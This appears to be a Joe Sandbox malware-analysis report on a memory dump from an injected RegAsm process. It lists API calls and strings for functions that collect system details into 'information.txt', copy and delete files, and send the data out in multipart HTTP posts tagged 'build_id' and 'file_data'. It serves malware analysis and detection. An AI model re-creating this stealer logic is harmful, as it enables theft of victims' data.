Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 6b734987125c8227cee17a821c4919c7b176039203df09d84d006e5eead2658a
Instruction ID: e67ec923288100549a4ce3737427f724e149395f5d0e6aa62fb89660ea35136e
Opcode Fuzzy Hash: 6b734987125c8227cee17a821c4919c7b176039203df09d84d006e5eead2658a
Instruction Fuzzy Hash: BCD05B7580011DD7CF10D790FD8998D777CAB04208F4001A19B00F2080E674E65DCBD5

Function 004043AD Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 764
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004043B2

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

lstrlenA.KERNEL32(00000000), ref: 00404421

Part of subcall function 00411A55: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411A79
Part of subcall function 00411A55: GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00411A86
Part of subcall function 00411A55: HeapAlloc.KERNEL32(00000000,?,00404415,?,?,?,?,?,?), ref: 00411A8D

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

StrCmpCA.SHLWAPI(?,004269A7,004269A3,0042699B,00426997,00426996), ref: 004044A4
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004045E9
HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00404623
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404647

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00426A60,00000000,?,?,00000000), ref: 00404B42
lstrlenA.KERNEL32(00000000), ref: 00404B54
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B66
HeapAlloc.KERNEL32(00000000), ref: 00404B6D
lstrlenA.KERNEL32(00000000), ref: 00404B7F
memcpy.MSVCRT ref: 00404B92
lstrlenA.KERNEL32(00000000,?,?), ref: 00404BA9
memcpy.MSVCRT ref: 00404BB3
lstrlenA.KERNEL32(00000000), ref: 00404BC4
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404BDD
memcpy.MSVCRT ref: 00404BEA
lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404BFF
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C10
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C37
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CB9
StrCmpCA.SHLWAPI(00000000,block), ref: 00404CD1
ExitProcess.KERNEL32 ref: 00404CDC
InternetCloseHandle.WININET(?), ref: 00404CEC

Strings

------, xrefs: 0040464D
", xrefs: 00404720
ERROR, xrefs: 00404C44
--, xrefs: 00404544
block, xrefs: 00404CC3
ERROR, xrefs: 00404DBB
", xrefs: 0040486F
file_data, xrefs: 00404AE5
", xrefs: 00404B0F
/, xrefs: 00404C97
------, xrefs: 0040451D
------, xrefs: 004048EE
------, xrefs: 00404A3D
", xrefs: 004049C1
------, xrefs: 0040479D
build_id, xrefs: 00404845

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$AllocOpenRequestlstrcat$BinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$/$ERROR$ERROR$block$build_id$file_data
API String ID: 2658035217-3274521816
Opcode ID: 6e66fb4bf7817e57e50a80c7476a32aefbf878d813f21216fb9fef3cce53c941
Instruction ID: 7d5c8d1188ad9f3d6de2468e2ed8b41181b7a62eaf61c594de7c6e8ee400d370
Opcode Fuzzy Hash: 6e66fb4bf7817e57e50a80c7476a32aefbf878d813f21216fb9fef3cce53c941
Instruction Fuzzy Hash: E3624371800148EEDB15EBE1C955EEEBBB8AF15308F10405EE505B3182EFB96BC8DB65

Function 00405C89 Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 640
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00405C8E

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405D39
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405ED8
HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00405F0F
lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00426AE8,00000000), ref: 00406309
lstrlenA.KERNEL32(00000000), ref: 0040631A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406324
HeapAlloc.KERNEL32(00000000), ref: 0040632B
lstrlenA.KERNEL32(00000000), ref: 0040633C
memcpy.MSVCRT ref: 0040634D
lstrlenA.KERNEL32(00000000), ref: 0040635E
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00406377
memcpy.MSVCRT ref: 00406380
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00406393
HttpSendRequestA.WININET(?,00000000,00000000), ref: 004063A7
InternetReadFile.WININET(?,?,000000C7,?), ref: 004063FB
InternetCloseHandle.WININET(?), ref: 00406406
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405F34

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

InternetCloseHandle.WININET(?), ref: 0040640F
InternetCloseHandle.WININET(?), ref: 00406418
StrCmpCA.SHLWAPI(?), ref: 00405D50

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Strings

build_id, xrefs: 00406132
mode, xrefs: 00406283
------, xrefs: 0040608A
------, xrefs: 00405DD2
------, xrefs: 004061DB
", xrefs: 0040600D
(, xrefs: 0040645A
", xrefs: 0040615C
------, xrefs: 00405F3A
", xrefs: 004062AD

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$($------$------$------$------$build_id$mode
API String ID: 2237346945-1447386369
Opcode ID: 7615f919e3c06c01eda2efb4e4bc08ec924165e11e3fb4c577c529d01785e9db
Instruction ID: 09783c5eb6587d17bc74655d5a5d08ec150deaebb744c9a2cc939deef28d4a05
Opcode Fuzzy Hash: 7615f919e3c06c01eda2efb4e4bc08ec924165e11e3fb4c577c529d01785e9db
Instruction Fuzzy Hash: 06423371800248EADB05EBE1C956EEEBBB8AF15308F10005EE505B3182DFB91BD9DB75

Function 004158E5 Relevance: 51.8, APIs: 3, Strings: 26, Instructions: 1004
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004158EA

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 004108E1: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,004275FA), ref: 004108EF
Part of subcall function 004108E1: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,004275FA), ref: 004108F6
Part of subcall function 004108E1: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,004275FA), ref: 00410902
Part of subcall function 004108E1: wsprintfA.USER32 ref: 0041092D

Part of subcall function 004110BE: memset.MSVCRT ref: 004110E4
Part of subcall function 004110BE: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004275FA,?,?,00000000), ref: 00411100
Part of subcall function 004110BE: RegQueryValueExA.KERNEL32(004275FA,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0041111F
Part of subcall function 004110BE: CharToOemA.USER32(?,?), ref: 0041113C

Part of subcall function 0041114B: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041115C

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 00411186: _EH_prolog.MSVCRT ref: 0041118B
Part of subcall function 00411186: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 004111AE
Part of subcall function 00411186: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 004111E0
Part of subcall function 00411186: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00411223
Part of subcall function 00411186: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0041122A

GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,0042778C,00000000,?,00000000,00000000,?,HWID: ,00000000,?,00427780,00000000), ref: 00415C03

Part of subcall function 00411CAA: OpenProcess.KERNEL32(00000410,00000000,00415C13), ref: 00411CC2
Part of subcall function 00411CAA: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411CDD
Part of subcall function 00411CAA: CloseHandle.KERNEL32(00000000), ref: 00411CE4

Part of subcall function 004112F4: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00415CF8,00000000,?,Windows: ,00000000,?,004277B0,00000000,?,Work Dir: In memory), ref: 00411308
Part of subcall function 004112F4: HeapAlloc.KERNEL32(00000000,?,?,?,00415CF8,00000000,?,Windows: ,00000000,?,004277B0,00000000,?,Work Dir: In memory,00000000,?), ref: 0041130F

Part of subcall function 00411425: _EH_prolog.MSVCRT ref: 0041142A
Part of subcall function 00411425: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,004277B0,00000000,?,Work Dir: In memory,00000000), ref: 00411442
Part of subcall function 00411425: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 00411453
Part of subcall function 00411425: CoCreateInstance.OLE32(00428080,00000000,00000001,00427FB0,?,?,00000000,?,?,?,?,?,?,004277B0,00000000,?), ref: 0041146D
Part of subcall function 00411425: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004114A3
Part of subcall function 00411425: VariantInit.OLEAUT32(?), ref: 004114FE

Part of subcall function 004115CE: _EH_prolog.MSVCRT ref: 004115D3
Part of subcall function 004115CE: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,004277B0,00000000,?,Work Dir: In memory,00000000,?,00427798,00000000,?,00000000), ref: 004115EB
Part of subcall function 004115CE: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,004277B0,00000000,?,Work Dir: In memory,00000000), ref: 004115FC
Part of subcall function 004115CE: CoCreateInstance.OLE32(00428080,00000000,00000001,00427FB0,?,?,00000000,004277B0,00000000,?,Work Dir: In memory,00000000,?,00427798,00000000,?), ref: 00411616
Part of subcall function 004115CE: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,004277B0,00000000,?,Work Dir: In memory,00000000,?), ref: 0041164C
Part of subcall function 004115CE: VariantInit.OLEAUT32(?), ref: 0041169F

Part of subcall function 004108A6: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,00415E9F,00000000,?,Computer Name: ,00000000,?,004277E0,00000000,?,00000000,00000000), ref: 004108B2
Part of subcall function 004108A6: HeapAlloc.KERNEL32(00000000,?,?,00415E9F,00000000,?,Computer Name: ,00000000,?,004277E0,00000000,?,00000000,00000000,?,AV: ), ref: 004108B9
Part of subcall function 004108A6: GetComputerNameA.KERNEL32(00000000,00000000), ref: 004108CD

Part of subcall function 00410874: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004185DE,00427727), ref: 00410880
Part of subcall function 00410874: HeapAlloc.KERNEL32(00000000,?,?,?,004185DE,00427727), ref: 00410887
Part of subcall function 00410874: GetUserNameA.ADVAPI32(00000000,?), ref: 0041089B

Part of subcall function 00411049: CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 0041105E
Part of subcall function 00411049: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411069
Part of subcall function 00411049: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00411074
Part of subcall function 00411049: ReleaseDC.USER32(00000000,00000000), ref: 0041107F
Part of subcall function 00411049: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00415FA1,?,00000000,?,Display Resolution: ,00000000,?,00427804,00000000,?), ref: 0041108B
Part of subcall function 00411049: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00415FA1,?,00000000,?,Display Resolution: ,00000000,?,00427804,00000000,?,00000000), ref: 00411092
Part of subcall function 00411049: wsprintfA.USER32 ref: 004110A4

Part of subcall function 0041098E: _EH_prolog.MSVCRT ref: 00410993
Part of subcall function 0041098E: GetKeyboardLayoutList.USER32(00000000,00000000,00427337,00000001,?,00000000), ref: 004109C5
Part of subcall function 0041098E: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 004109D3
Part of subcall function 0041098E: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 004109DE
Part of subcall function 0041098E: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 00410A08
Part of subcall function 0041098E: LocalFree.KERNEL32(?), ref: 00410AAC

Part of subcall function 0041093B: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,004277E0,00000000,?,00000000,00000000,?,AV: ), ref: 0041094C
Part of subcall function 0041093B: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004277E0,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 00410953
Part of subcall function 0041093B: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004277E0,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 00410962
Part of subcall function 0041093B: wsprintfA.USER32 ref: 00410980

Part of subcall function 00410AC1: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,0041621D,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00427860), ref: 00410AD5
Part of subcall function 00410AC1: HeapAlloc.KERNEL32(00000000,?,?,?,0041621D,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00427860,00000000,?), ref: 00410ADC
Part of subcall function 00410AC1: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0041621D,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 00410AFA
Part of subcall function 00410AC1: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,0041621D,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 00410B16

Part of subcall function 00410B5D: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410BB0
Part of subcall function 00410B5D: wsprintfA.USER32 ref: 00410BF6

Part of subcall function 00410B2A: GetSystemInfo.KERNEL32(00000000), ref: 00410B37
Part of subcall function 00410B2A: wsprintfA.USER32 ref: 00410B4C

Part of subcall function 00410C2A: GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,004277B0,00000000,?,Work Dir: In memory,00000000,?,00427798), ref: 00410C38
Part of subcall function 00410C2A: HeapAlloc.KERNEL32(00000000), ref: 00410C3F
Part of subcall function 00410C2A: GlobalMemoryStatusEx.KERNEL32 ref: 00410C5F
Part of subcall function 00410C2A: wsprintfA.USER32 ref: 00410C85

Part of subcall function 00410C93: _EH_prolog.MSVCRT ref: 00410C98
Part of subcall function 00410C93: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410D00

Part of subcall function 00410F6C: _EH_prolog.MSVCRT ref: 00410F71
Part of subcall function 00410F6C: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410FAC
Part of subcall function 00410F6C: Process32First.KERNEL32(00000000,00000128), ref: 00410FBD
Part of subcall function 00410F6C: Process32Next.KERNEL32(?,00000128), ref: 00411025
Part of subcall function 00410F6C: CloseHandle.KERNEL32(?,?,00000000), ref: 00411032

Part of subcall function 00410D1A: _EH_prolog.MSVCRT ref: 00410D1F
Part of subcall function 00410D1A: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042734F,00000001,00000000), ref: 00410D67

Part of subcall function 00410D1A: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410DB1
Part of subcall function 00410D1A: wsprintfA.USER32 ref: 00410DDB
Part of subcall function 00410D1A: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410DF8
Part of subcall function 00410D1A: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410E22
Part of subcall function 00410D1A: lstrlenA.KERNEL32(?), ref: 00410E37
Part of subcall function 00410D1A: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00427378), ref: 00410EB7

lstrlenA.KERNEL32(00000000,00000000,?,004278D4,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,004278C4), ref: 0041665B

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415718: _EH_prolog.MSVCRT ref: 0041571D
Part of subcall function 00415718: CreateThread.KERNEL32(00000000,00000000,00413F49,?,00000000,00000000), ref: 004157C3
Part of subcall function 00415718: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004157CB

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

Local Time: , xrefs: 004160A2
[Hardware], xrefs: 004161B8
RAM: , xrefs: 00416383
User Name: , xrefs: 00415EEF
T, xrefs: 0041668F
VideoCard: , xrefs: 00416408
MachineID: , xrefs: 00415A32
Path: , xrefs: 00415BD9
Date: , xrefs: 004159B3
[Software], xrefs: 00416560
Version: , xrefs: 00415906
GUID: , xrefs: 00415AB1
Display Resolution: , xrefs: 00415F6E
Windows: , xrefs: 00415CC9
Computer Name: , xrefs: 00415E70
information.txt, xrefs: 00416676
Install Date: , xrefs: 00415D48
[Processes], xrefs: 004164B4
Processor: , xrefs: 004161E8
Keyboard Languages: , xrefs: 00416002
Work Dir: In memory, xrefs: 00415C75
TimeZone: , xrefs: 00416133
HWID: , xrefs: 00415B45
Threads: , xrefs: 004162FE
AV: , xrefs: 00415DDC
Cores: , xrefs: 00416279

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $T$Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 722754166-3257470747
Opcode ID: fa3be4a4b4d4580d3c2b7ba19692a791157f5e4e11ec21f97a730b364a590bc3
Instruction ID: aa46cbac0d35b11ce9898ffee0b9b7d44f604a81c90b8605846a8daf943e72b8
Opcode Fuzzy Hash: fa3be4a4b4d4580d3c2b7ba19692a791157f5e4e11ec21f97a730b364a590bc3
Instruction Fuzzy Hash: CE920F71805248E9DB15E7E1C956EEEBB786F24308F10408FA54573182EFB92BC8DBB5

Function 0040CDBC Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 296
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040CDC1

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00411805: _EH_prolog.MSVCRT ref: 0041180A
Part of subcall function 00411805: GetSystemTime.KERNEL32(?,00427520,00000001,000000C8,00000000,00427722), ref: 0041184A

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00426C2C,?,?,?,00426C1F,?,00000000), ref: 0040CEB9
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040CF1A
RtlAllocateHeap.NTDLL(00000000), ref: 0040CF21
lstrlenA.KERNEL32(00000000,00000000), ref: 0040CFB1
lstrcat.KERNEL32(00000000), ref: 0040CFC8
lstrcat.KERNEL32(00000000,00000000), ref: 0040CFDA
lstrcat.KERNEL32(00000000,00426C30), ref: 0040CFE8
lstrcat.KERNEL32(00000000,00000000), ref: 0040CFFA
lstrcat.KERNEL32(00000000,00426C34), ref: 0040D008
lstrcat.KERNEL32(00000000), ref: 0040D017
lstrcat.KERNEL32(00000000,00000000), ref: 0040D029
lstrcat.KERNEL32(00000000,00426C38), ref: 0040D037
lstrcat.KERNEL32(00000000), ref: 0040D046
lstrcat.KERNEL32(00000000,00000000), ref: 0040D058
lstrcat.KERNEL32(00000000,00426C3C), ref: 0040D066
lstrcat.KERNEL32(00000000), ref: 0040D075
lstrcat.KERNEL32(00000000,00000000), ref: 0040D087
lstrcat.KERNEL32(00000000,00426C40), ref: 0040D095
lstrcat.KERNEL32(00000000,00426C44), ref: 0040D0A3
lstrlenA.KERNEL32(00000000), ref: 0040D0D7
memset.MSVCRT ref: 0040D12A
DeleteFileA.KERNEL32(00000000), ref: 0040D157

